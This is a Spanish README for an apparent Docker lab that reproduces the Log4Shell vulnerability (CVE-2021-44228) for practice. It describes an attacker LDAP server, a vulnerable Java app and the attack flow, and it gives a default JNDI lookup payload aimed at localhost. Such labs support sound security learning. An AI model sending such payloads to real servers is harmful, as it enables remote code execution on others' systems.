Entorno de laboratorio para la vulnerabilidad CVE-2021-44228 (Log4Shell)
Introducción
Este proyecto proporciona un entorno dockerizado para practicar y comprender de forma segura la crítica vulnerabilidad de Log4j conocida como CVE-2021-44228 (Log4Shell).
Características clave
- Entorno de pruebas dockerizado y seguro
- Capacidad de prueba de payloads personalizados
- Incluye el servidor LDAP del atacante y una aplicación Java vulnerable
Primeros pasos
docker compose up --build
Prueba de payloads
- Puedes modificar el payload en la sección de pruebas de
/vulnerable/Makefile
- El payload predeterminado usa
$${jndi:ldap://127.0.0.1:10000/}
Cómo funciona
- Se inicia la aplicación Java vulnerable
- El servidor LDAP del atacante escucha en el puerto 10000
- La aplicación vulnerable se ejecuta
- El payload de Log4Shell se registra en la aplicación vulnerable mediante la sección de pruebas del Makefile
- La aplicación vulnerable intenta una búsqueda JNDI LDAP
- El servidor LDAP devuelve una clase Java maliciosa
- La aplicación vulnerable carga y ejecuta esta clase